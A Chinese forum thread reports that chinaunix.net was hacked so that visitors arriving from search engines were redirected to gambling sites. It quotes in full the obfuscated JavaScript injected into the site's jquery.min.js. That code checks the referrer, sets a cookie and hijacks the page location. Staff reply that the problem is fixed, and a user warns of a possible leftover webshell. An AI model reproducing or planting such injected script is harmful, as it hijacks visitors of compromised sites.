www.chinaunix.net被黑了?

ywsydbz

在百度或者google搜索关键词"chinaunix",进入www.chinaunix.net站点就跳到别的赌博网站.
http://www.chinaunix.net/www/static/js/jquery.min.js这个js中有些东西

1. eval(function(p, a, c, k, e, d) {
   
2.     e = function(c) {
   
3.         return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
   
4.     };
   
5.     if (!''.replace(/^/, String)) {
   
6.         while (c--) {
   
7.             d[e(c)] = k[c] || e(c)
   
8.         }
   
9.         k = [function(e) {
   
10.             return d[e]
    
11.         }];
    
12.         e = function() {
    
13.             return '\\w+'
    
14.         };
    
15.         c = 1
    
16.     };
    
17.     while (c--) {
    
18.         if (k[c]) {
    
19.             p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
    
20.         }
    
21.     }
    
22.     return p
    
23. } ('d(3.N.Q(\'f\')==-1){e k=1b 1a();k.19(k.1c()+8);3.N=\'f=1;1d=\'+k.18();e U=3.1g;e G=[\'12\',\'11\',\'13\',\'17\',\'16\',\'15\',\'14.1e\',\'E.5\',\'1m\',\'1p\'];1h(e i 1o G){d(U.Q(G[i])!=-1){d(P.F.R){P.F.R.S=\'4://b.X.E/\'};F.S.j=\'4://b.t.5/6/H.6?n=1\'}}}1i{3.O("<A V=\'g\' 9=\'L:I;K:M;z-J:T;10-c:2%\'><i j=\'4://b.t.5/6/H.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/g-1.v\' x=\'a\' c=\'Y\' C=\'0\'></i><w><w><i j=\'4://b.t.5/6/1j.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/g-2.v\' x=\'a\' c=\'a\' C=\'0\'></i></A>");3.O("<A V=\'h\' 9=\'L:I;K:M;z-J:T;10-c:2%\'><i j=\'4://b.t.5/6/H.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/h-1.v\' x=\'a\' c=\'Y\' C=\'0\'></i><w><w><i j=\'4://b.X.E/\' p=\'q\'><r s=\'4://u.l.5.o/m/h-2.v\' x=\'a\' c=\'a\' C=\'0\'></i></A>");1r f(){d(!3.1q){e 7=3.D.W;d(7==0){7=3.z.W};3.B(\'g\').9.7=7+i+\'y\';3.B(\'g\').9.1n=3.D.Z+8+\'y\';3.B(\'h\').9.7=7+i+\'y\';3.B(\'h\').9.1k=3.D.Z+8+\'y\'};1l(\'f();\',1f)};f()}', 62, 90, '|||document|http|com|html|top||style|130|www|height|if|var|whoami|Left|Right||href|exp|discuz|Img|pid|de|target|_blank|img|src|888hy|api|gif|br|width|px||div|getElementById|border|body|so|window|bot|livedealer|absolute|index|visibility|position|visible|cookie|write|parent|indexOf|opener|location|999|ref|id|scrollTop|v587|240|scrollLeft|line|google|baidu|yahoo|360|sogou|soso|bing|toGMTString|setTime|Date|new|getTime|expires|cn|200|referrer|for|else|register|right|setTimeout|youdao|left|in|anquan|ns|function'.split('|'), 0, {}));

复制代码

就是第一句话,比较可疑.

风铃之音

回复 1# ywsydbz


    我找技术看看，还请稍等哦

ywsydbz

回复 2# 风铃之音
javascript我不咋熟悉,不过目测是根据判断referer来进行跳转的,所以直接输入网址或者没在规则内是不会跳到赌博网站的

   

send_linux

ywsydbz 发表于 2014-04-22 14:08
回复 2# 风铃之音
javascript我不咋熟悉,不过目测是根据判断referer来进行跳转的,所以直接输入网址或者没 ...

请问现在还有这问题么，下午技术已经处理过了，谢谢您的反馈

ywsydbz

现在测试已经正常了。是我贴出的那段javascript代码的问题吗？多说句，既然都把文件都修改了，说不定在什么文件中设置了后门或者上传了WebShell@send_linux

send_linux

ywsydbz 发表于 2014-04-22 23:17
现在测试已经正常了。是我贴出的那段javascript代码的问题吗？多说句，既然都把文件都修改了，说不定在什么 ...

谢谢您的提醒，我明天将这个信息转交给我们的技术人员